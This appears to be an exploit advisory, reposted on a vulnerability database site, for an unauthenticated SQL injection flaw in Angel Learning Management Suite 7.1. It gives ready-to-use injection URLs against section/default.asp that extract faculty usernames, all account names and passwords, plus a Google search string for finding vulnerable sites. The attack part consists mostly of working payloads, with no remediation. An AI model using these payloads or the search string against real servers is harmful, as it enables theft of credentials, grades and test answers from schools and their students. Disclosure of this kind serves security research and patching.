######################################################################### # # Application: # # Angel Learning Management Suite 7.1 # http://www.angellearning.com # ######################################################################### # # Description: # # \"ANGEL LMS is an inclusive suite of enterprise # learning management tools that balances ease of # use with powerful capabilities to deliver leading # edge teaching and learning, impact learner success # and measure effectiveness.\" # # Basically, Angel is a CMS for education, providing # online forums, grading, email, chat, etc to faculty # and students. It is used as the primary Web interface # for several online schools and courses. # ######################################################################### # # Vulnerability: # # Angel 7.1 contains an SQL injection vulnerability in # section/default.asp that grants an un-authenticated user # access to all database tables and data. Examples include # enumeration of tables, columns, user names, passwords, # grades, and test questions/answers (you basically have # access to everything). # ######################################################################### # # Exploit Examples: # # #Enumerate Faculty User Accounts# # http://[Angel Root Directory]/section/default.asp?id=\'%20union%20select%20top%201%20username%20from%20faculty_accounts--\" # # #Enumerate All User Accounts# # http://[Angel Root Directory]/section/default.asp?id=\'%20union%20select%20top%201%20username%20from%20accounts--\" # # #Enumerate Account Passwords# # http://[Angel Root Directory]/section/default.asp?id=\'%20union%20select%20top%201%20password%20from%20accounts--\" # ######################################################################### # # Google Dork: # intext:\"2006 angel learning, inc\" -pdf # ######################################################################### # # Credit: # Exploit discovered and coded by Craig Heffner # heffnercj [at] gmail.com # http://www.craigheffner.com # #########################################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论